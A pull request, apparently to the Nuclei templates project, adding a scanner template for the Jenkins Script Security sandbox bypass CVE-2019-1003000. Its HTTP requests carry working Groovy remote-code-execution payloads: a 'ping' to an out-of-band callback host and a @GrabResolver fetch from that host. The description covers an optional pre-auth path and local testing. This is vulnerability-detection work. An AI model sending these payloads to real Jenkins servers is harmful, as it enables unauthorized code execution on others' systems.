### PR TITLE
Add CVE-2019-1003000.yaml Template - Jenkins Script Security Plugin Sandbox Bypass

### DIFF
--- a/http/cves/2019/CVE-2019-1003000.yaml
+++ b/http/cves/2019/CVE-2019-1003000.yaml
@@ -31,7 +31,7 @@ variables:
 flow: http(1,2) && (http(3) || http(4))
 
 http:
-  - raw: 
+  - raw:
       - |
         GET /login HTTP/1.1
         Host: {{Hostname}}
@@ -41,7 +41,7 @@ http:
       - type: word
         part: body
         words:
-          - 'Jenkins'
+          - "Jenkins"
           - 'name="j_username"'
           - 'name="j_password"'
         internal: true
@@ -64,7 +64,7 @@ http:
           - 'contains(body_2, "[Jenkins]</title>")'
         condition: and
         internal: true
-    
+
   - raw:
       - |
         GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
@@ -74,12 +74,12 @@ http:
         Host: {{Hostname}}
 
     stop-at-first-match: true
-    matchers:      
+    matchers:
       - type: word
         part: interactsh_protocol
         words:
           - "dns"
-  
+
   - raw:
       - |
         GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
@@ -87,7 +87,7 @@ http:
 
     stop-at-first-match: true
     matchers-condition: and
-    matchers:      
+    matchers:
       - type: word
         part: interactsh_protocol
         words:
@@ -96,4 +96,4 @@ http:
       - type: word
         part: interactsh_request
         words:
-            - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"
+          - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"

--- a/http/cves/2019/CVE-2019-1003000.yaml
+++ b/http/cves/2019/CVE-2019-1003000.yaml
@@ -60,7 +60,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(tolower(body_2), "jenkins", "/logout")'
+          - 'contains_all(tolower(body_2), "jenkins", "/logout")'
         internal: true
 
   - raw:

--- a/http/cves/2019/CVE-2019-1003000.yaml
+++ b/http/cves/2019/CVE-2019-1003000.yaml
@@ -1,0 +1,99 @@
+id: CVE-2019-1003000
+
+info:
+  name: Jenkins Script Security Plugin - Sandbox Bypass
+  author: sttlr
+  severity: high
+  description: |
+    A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-1003000
+    cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::*
+  reference:
+    - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
+    - http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
+    - https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
+    - https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
+    - https://github.com/purple-WL/Jenkins_CVE-2019-1003000
+    - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
+  metadata:
+    vendor: jenkins
+    product: script_security
+  tags: cve,cve2019,jenkins,code
+
+variables:
+  username: admin
+  vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
+  app_name: "{{rand_text_alpha(8)}}"
+
+flow: http(1,2) && (http(3) || http(4))
+
+http:
+  - raw: 
+      - |
+        GET /login HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Jenkins'
+          - 'name="j_username"'
+          - 'name="j_password"'
+        internal: true
+
+  - raw:
+      - |
+        POST /j_acegi_security_check HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "/logout")'
+          - 'contains(body_2, "[Jenkins]</title>")'
+        condition: and
+        internal: true
+    
+  - raw:
+      - |
+        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
+    matchers:      
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+  
+  - raw:
+      - |
+        GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:      
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+            - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"

--- a/http/cves/2019/CVE-2019-1003000.yaml
+++ b/http/cves/2019/CVE-2019-1003000.yaml
@@ -1,7 +1,7 @@
 id: CVE-2019-1003000
 
 info:
-  name: Jenkins Script Security Plugin - Sandbox Bypass
+  name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
   author: sttlr
   severity: high
   description: |
@@ -19,9 +19,10 @@ info:
     - https://github.com/purple-WL/Jenkins_CVE-2019-1003000
     - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
   metadata:
+    max-request: 6
     vendor: jenkins
     product: script_security
-  tags: cve,cve2019,jenkins,code
+  tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass
 
 variables:
   username: admin
@@ -36,15 +37,13 @@ http:
         GET /login HTTP/1.1
         Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "Jenkins"
-          - 'name="j_username"'
-          - 'name="j_password"'
+          - "jenkins"
         internal: true
+        case-insensitive: true
 
   - raw:
       - |
@@ -53,6 +52,7 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
+
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
@@ -60,15 +60,14 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body_2, "/logout")'
-          - 'contains(body_2, "[Jenkins]</title>")'
-        condition: and
+          - 'contains(tolower(body_2), "jenkins", "/logout")'
         internal: true
 
   - raw:
       - |
         GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
         Host: {{Hostname}}
+
       - |
         GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
         Host: {{Hostname}}
@@ -85,7 +84,6 @@ http:
         GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
         Host: {{Hostname}}
 
-    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word

--- a/http/cves/2019/CVE-2019-1003000.yaml
+++ b/http/cves/2019/CVE-2019-1003000.yaml
@@ -19,17 +19,18 @@ info:
     - https://github.com/purple-WL/Jenkins_CVE-2019-1003000
     - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
   metadata:
+    verified: true
     max-request: 6
     vendor: jenkins
     product: script_security
-  tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass
+  tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated
 
 variables:
   username: admin
   vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
   app_name: "{{rand_text_alpha(8)}}"
 
-flow: http(1,2) && (http(3) || http(4))
+flow: http(1) && http(2) && (http(3) || http(4))
 
 http:
   - raw:


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

Wrote template for CVE-2019-1003000 - Jenkins Script Security Plugin Sandbox Bypass.

Optional parameters: `username` and `password`

If credentials are not provided - try Pre-Auth (if the target is also vulnerable to CVE-2018-1999001), then `username` is `admin`.

Try exploiting using 2 gadgets (with reliable first):
- `scriptsecurity.sandbox.groovy.SecureGroovyScript` (reliable)
- `workflow.cps.CpsFlowDefinition` (less reliable)

RCE confirmed via `interactsh` dns callback for the first gadget, and http callback for the second gadget.

References:
- https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jenkins_metaprogramming.rb
- https://github.com/orangetw/awesome-jenkins-rce-2019

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO

Using https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION run:
```bash
cd jenkins_environment
./run_vuln_jenkins.sh
```

This spins up vulnerable Jenkins instance on `localhost:8080` with credentials `username=Naruto`, `password=Uzumaki`.

With credentials:
<img width="1154" alt="image" src="https://github.com/user-attachments/assets/59782d02-6b5b-4146-8619-9a643873c8dd">

Without credentials (Pre-Auth if the target is also vulnerable to CVE-2018-1999001):
<img width="1157" alt="image" src="https://github.com/user-attachments/assets/42be8ffb-66d7-463d-90fb-3828fe66d394">

#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

/claim #10892

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)